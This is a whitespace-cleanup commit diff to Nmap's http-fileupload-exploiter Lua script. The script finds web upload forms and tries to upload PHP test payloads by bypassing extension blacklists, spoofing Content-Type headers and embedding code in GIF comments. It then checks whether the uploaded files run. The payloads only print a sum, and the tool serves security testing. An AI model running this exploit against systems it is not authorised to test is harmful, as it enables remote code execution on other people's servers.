
Remove trailing whitespace in lua files

Trailing whitespace is not significant, so removing it should not be a problem.
https://secwiki.org/w/Nmap/Code_Standards
This commit is contained in:
dmiller
2014-01-23 21:51:58 +00:00
parent 86ac3c0a19
commit 620f9fdb34
499 changed files with 11134 additions and 11134 deletions


@@ -1,51 +1,51 @@
description = [[
Exploits insecure file upload forms in web applications
using various techniques like changing the Content-type
header or creating valid image files containing the
header or creating valid image files containing the
payload in the comment.
]]
---
-- @usage nmap -p80 --script http-fileupload-exploiter.nse <target>
--
--
-- This script discovers the upload form on the target's page and
-- attempts to exploit it using 3 different methods:
--
-- 1) At first, it tries to upload payloads with different insecure
-- extensions. This will work against a weak blacklist used by a file
-- 1) At first, it tries to upload payloads with different insecure
-- extensions. This will work against a weak blacklist used by a file
-- name extension verifier.
--
-- 2) If (1) doesn't work, it will try to upload the same payloads
-- this time with different Content-type headers, like "image/gif"
-- instead of the "text/plain". This will trick any mechanisms that
-- 2) If (1) doesn't work, it will try to upload the same payloads
-- this time with different Content-type headers, like "image/gif"
-- instead of the "text/plain". This will trick any mechanisms that
-- check the MIME type.
--
-- 3) If (2), doesn't work, it will create some proper GIF images
-- that contain the payloads in the comment. The interpreter will
-- 3) If (2), doesn't work, it will create some proper GIF images
-- that contain the payloads in the comment. The interpreter will
-- see the executable inside some binary garbage. This will bypass
-- any check of the actual content of the uploaded file.
--
-- TODO:
-- * Use the vulns library to report.
--
-- @args http-fileupload-exploiter.formpaths The pages that contain
-- @args http-fileupload-exploiter.formpaths The pages that contain
-- the forms to exploit. For example, {/upload.php, /login.php}.
-- Default: nil (crawler mode on)
-- @args http-fileupload-exploiter.uploadspaths Directories with
-- the uploaded files. For example, {/avatars, /photos}. Default:
-- @args http-fileupload-exploiter.uploadspaths Directories with
-- the uploaded files. For example, {/avatars, /photos}. Default:
-- {'/uploads', '/upload', '/file', '/files', '/downloads'}
-- @args http-fileupload-exploiter.fieldvalues The script will try to
-- @args http-fileupload-exploiter.fieldvalues The script will try to
-- fill every field found in the upload form but that may fail
-- due to fields' restrictions. You can manually fill those
-- fields using this table. For example, {gender = "male", email
-- due to fields' restrictions. You can manually fill those
-- fields using this table. For example, {gender = "male", email
-- = "foo@bar.com"}. Default: {}
--
-- @output
-- PORT STATE SERVICE REASON
-- 80/tcp open http syn-ack
-- | Testing page /post.html
-- |
-- | Succesfully uploaded and executed payloads:
-- |
-- | Succesfully uploaded and executed payloads:
-- | Filename: 1.php, MIME: text/plain
-- |_ Filename: 1.php3, MIME: text/plain
---
@@ -65,15 +65,15 @@ local table = require "table"
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")
-- A list of payloads. The interpreted code in the 'content' variable should
-- A list of payloads. The interpreted code in the 'content' variable should
-- output the result in the 'check' variable.
--
-- You can manually add / remove your own payloads but make sure you
-- don't mess up, otherwise the script may succeed when it actually
-- hasn't.
-- You can manually add / remove your own payloads but make sure you
-- don't mess up, otherwise the script may succeed when it actually
-- hasn't.
--
-- Note, that more payloads will slow down your scan significaly.
payloads = { { filename = "1.php", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
payloads = { { filename = "1.php", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
{ filename = "1.php3", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
-- { filename = "1.php4", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
-- { filename = "1.shtml", content = "<?php echo 123456 + 654321; ?>", check = "777777" },
@@ -87,7 +87,7 @@ payloads = { { filename = "1.php", content = "<?php echo 123456 + 654321; ?>", c
listofrequests = {}
-- Escape for jsp and asp payloads.
local escape = function(s)
local escape = function(s)
return (s:gsub('%%', '%%%%'))
end
@@ -110,9 +110,9 @@ local function UploadRequest(host, port, submission, partofrequest, name, filena
local options = { header={} }
options['header']['Content-Type'] = "multipart/form-data; boundary=AaB03x"
options['content'] = self.partofrequest .. '--AaB03x\nContent-Disposition: form-data; name="' .. self.name .. '"; filename="' .. self.filename .. '"\nContent-Type: ' .. self.mime .. '\n\n' .. self.payload .. '\n--AaB03x--'
stdnse.print_debug(2, "Making a request: Header: " .. options['header']['Content-Type'] .. "\nContent: " .. escape(options['content']))
local response = http.post(self.host, self.port, self.submission, options, { no_cache = true })
return response.body
@@ -121,7 +121,7 @@ local function UploadRequest(host, port, submission, partofrequest, name, filena
checkPayload = function(self, uploadspaths)
for _, uploadpath in ipairs(uploadspaths) do
local response = http.get(host, port, uploadpath .. '/' .. filename, { no_cache = true } )
if response.status ~= 404 then
if (response.body:match(self.check)) then
self.success = 1
@@ -140,7 +140,7 @@ local buildRequests = function(host, port, submission, name, mime, partofrequest
for i, p in ipairs(payloads) do
if image then
p['content'] = string.gsub(image, '!!comment!!', escape(p['content']), 1, true)
p['content'] = string.gsub(image, '!!comment!!', escape(p['content']), 1, true)
end
UploadRequest(host, port, submission, partofrequest, name, p['filename'], mime, p['content'], p['check'])
end
@@ -194,8 +194,8 @@ local prepareRequest = function(fields, fieldvalues)
end
return req, filefield
end
end
action = function(host, port)
@@ -203,10 +203,10 @@ action = function(host, port)
local uploadspaths = stdnse.get_script_args("http-fileupload-exploiter.uploadspaths") or {'/uploads', '/upload', '/file', '/files', '/downloads'}
local fieldvalues = stdnse.get_script_args("http-fileupload-exploiter.fieldvalues") or {}
local returntable = {}
local returntable = {}
local result
local foundform = 0
local foundform = 0
local foundfield = 0
local fail = 0
@@ -218,7 +218,7 @@ action = function(host, port)
end
crawler:set_timeout(10000)
local index, k, target, response
while (true) do
@@ -230,7 +230,7 @@ action = function(host, port)
end
response = http.get(host, port, target)
else
local status, r = crawler:crawl()
-- if the crawler fails it can be due to a number of different reasons
-- most of them are "legitimate" and should not be reason to abort
@@ -244,27 +244,27 @@ action = function(host, port)
target = tostring(r.url)
response = r.response
end
if response.body then
if response.body then
local forms = http.grab_forms(response.body)
for i, form in ipairs(forms) do
for i, form in ipairs(forms) do
form = http.parse_form(form)
if form then
local action_absolute = string.find(form["action"], "https*://")
-- Determine the path where the form needs to be submitted.
local submission
if action_absolute then
submission = form["action"]
else
else
local path_cropped = string.match(target, "(.*/).*")
path_cropped = path_cropped and path_cropped or ""
submission = path_cropped..form["action"]
@@ -277,7 +277,7 @@ action = function(host, port)
if filefield ~= 0 then
foundfield = 1
-- Method (1).
buildRequests(host, port, submission, filefield["name"], "text/plain", partofrequest, uploadspaths)
@@ -286,14 +286,14 @@ action = function(host, port)
table.insert(returntable, result)
break
end
-- Method (2).
buildRequests(host, port, submission, filefield["name"], "image/gif", partofrequest, uploadspaths)
buildRequests(host, port, submission, filefield["name"], "image/png", partofrequest, uploadspaths)
buildRequests(host, port, submission, filefield["name"], "image/jpeg", partofrequest, uploadspaths)
buildRequests(host, port, submission, filefield["name"], "image/jpeg", partofrequest, uploadspaths)
result = makeAndCheckRequests(uploadspaths)
if result then
if result then
table.insert(returntable, result)
break
end
@@ -301,7 +301,7 @@ action = function(host, port)
-- Method (3).
local inp = assert(io.open("nselib/data/pixel.gif", "rb"))
local image = inp:read("*all")
buildRequests(host, port, submission, filefield["name"], "image/gif", partofrequest, uploadspaths, image)
result = makeAndCheckRequests(uploadspaths)
@@ -310,8 +310,8 @@ action = function(host, port)
else
fail = 1
end
end
else
end
else
table.insert(returntable, {"Couldn't find a file-type field."})
end
end
@@ -321,7 +321,7 @@ action = function(host, port)
end
if (index) then
index = index + 1
else
else
index = 1
end
end